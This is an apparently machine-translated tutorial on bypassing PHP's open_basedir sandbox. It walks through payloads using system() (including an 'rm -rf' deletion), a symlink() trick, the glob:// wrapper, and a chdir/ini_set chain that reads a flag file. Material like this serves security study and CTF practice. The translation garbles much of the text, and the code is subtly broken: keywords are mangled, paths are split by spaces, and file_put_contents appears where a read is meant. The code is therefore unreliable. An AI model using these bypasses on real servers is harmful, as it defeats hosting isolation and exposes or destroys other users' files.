php open_basedir bypass settings

Principle
regarding open_basedir
    open_basedir is a configuration option in php.ini
    it may limit the scope of active users to access files in the specified area,
    assuming that open_basedir = / home / wwwroot / homethen access the server via web1 users can not get in addition to / home / wwwroot / home / web1and / tmp / directory of the two files on the server.
    Note the limit specified with open_basedir is actually a prefix, not a directory name.
    For example: If the "open_basedir = / dir / user"then the directory "/ dir / user" and "/ dir / user1" are accessible. So if you want to restrict access to only the specified directory, end with a slash path names.
Supplementary:
    ① If there is a semicolon before the php.ini configuration items, indicating that there is no php.ini settings. It is likely to be configured in php-fpm in fastcgi.conf in. php-fpm configuration overrides php.ini configuration.
    ② in php.ini or fastcgi.cong set, it is for all projects. If you want to set up a separate project, then the project root directory is configured by .user.ini.
    .user.ini configuration
    First, make .user.ini force, to be set in php.ini
        user_ini.filename = ".user.ini"
        user_ini.cache_ttl = 300
    Commented open_basedir configuration of fastcgi.conf in.
    .User.ini created in the root directory of the project file, write the following
         open_basedir = / tmp /: / proc /: / you_web_path
    restart the service to php-fpm.
About symbolic link
    symbolic link called soft link, is a special kind of file that contains the pathname (absolute or relative path) to another file.
    The path can be any file or directory, you can link files in different file systems. When the symbol file read or write operation, the system will automatically convert the operation to the operation of the source file, but delete the link file, the system simply delete the link file, without deleting the source file itself.

0x01 bypassing 1system command function
due to the execution of the function setting open_basedir is invalid commands on the system, so we can use the command function to restrict access to the directory.
We first create a directory
    / home / puret / test /
and a new 1.txt content in this directory is abc
    Nano 1.txt
then create a directory named b in the directory
    mkdir b
and create a 1 in the directory .php file content
    <PHP?
      echo file_get_contents ( "../ 1.txt");
    ?>
and set up our open_basedir in php.ini
    open_basedir = / home / puret / test / b /
we try to do 1.php see if open_basedir will limit our access
to perform the effect is as
obviously we can not read the catalog file other than the specified open_basedir directly.
Next we try to use system functions around open_basedir restrictions to delete 1.txt
edit 1.php to
    <PHP?
     System ( "RM -rf ../1.txt");
    ?>
Let's look before executing 1.php the case file
after the execution 1.php
successful execution of bypassing open_basedir function to delete the file from the command.
Since the command execution function generally is limited to disable_function them, so we need to find other ways to get around the restrictions.

0x02 bypass mode 2symlink () function
Let's take a look at symlink function
    BOOL symlink ($ String target, String $ link)
symlink function will create a symbolic link to a link target named, of course, under normal circumstances this target is limited in the open_basedir.
Since the early symlink does not support the windows, put on my test environment under Linux.
Testing PHP version is 5.3.0, other versions we self-test it.
Under Linux we can do some cross-directory operations can lead to bypass the logical file via symlink.
We begin in the content editing /var/www/html/1.php 1.php for
    <PHP?
      // Create a directory; mkdir ( "c")
      chdir ( "c"); // change directory
      mkdir ( "d ");
      the chdir (" D ");
      the chdir (" .. ");  
      the chdir (" .. ");
      the symlink (" C / D "," tmplink ");
      the symlink (" tmplink /../../ 1.txt "," exploit ");
      the unlink (" tmplink ");
      mkdir (" tmplink ");
      echo file_put_contents (" http://127.0.0.1/exploit ");
    ?>
and then at / var / www / in Create a new file 1.txt content
    "abc"
Again set about our open_basedir
    open_basedir = / var / the WWW / html /
in the html directory editing a php script to test it open_basedir
    <php?
       File_get_contents ( "../ 1.txt");
    ?>
Execute look.
Surprisingly, the file can not be accessed.
We just execute the script written, 1.php
can be seen to successfully read the contents of the file 1.txt, and escaped open_basedir restrictions of
the key issues is that
    symlink ( "tmplink /../../ 1.txt" , "exploit");
case tmplink file is a symbolic link, which points to the path c / d, and therefore exploit point becomes a path
    c / d /../../ 1.txt
Since this path open_basedir within the scope of the exploit so successfully established.
After we remove tmplink symbolic link files and then create a folder with the same name as tmplink, then the path is pointing to exploit
    tmplink /../../
Since this time tmplink become a real file folder so tmplink /. ./../ into a directory 1.txt where that is / var / www /
and then exploit 1.txt can be read by accessing a symbolic link to a file directly to the contents of the file
, of course, for symlink () only need it put disable_function can solve the problem, so we need to find more ways.

0x03 bypassing 3glob pseudo-protocol
glob is php 5.3.0 version since the beginning of a pseudo-protocol filtering directory to take effect, since it is unchecked screening directory open_basedir is, so we can use it to get around restrictions, we create a new directory in / var / www / named under test
and the new t.php content in / var / www / html / under for the
    <? php
      A = $ "glob: ///var/www/test/*.txt";
      IF (B = the opendir $ ($ A)) {
        the while (! ($ File = the readdir ($ B)) == to false) {
          echo "filename:" $ file "\ the n-";..
        }
        closedir ($ b);
      }
    >?
the results shown in Figure:
successfully escaped open_basedir restrictions to read the file.

The source 4 0x04 bypassing logic
blog https://xz.aliyun.com/t/4720
Payload:
the chdir ( 'IMG'); the ini_set ( 'open_basedir', '..'); the chdir ( '..') ; chdir ( '..'); chdir ( '..'); chdir ( '..'); ini_set ( 'open_basedir', '/'); echo (file_get_contents ( 'flag'));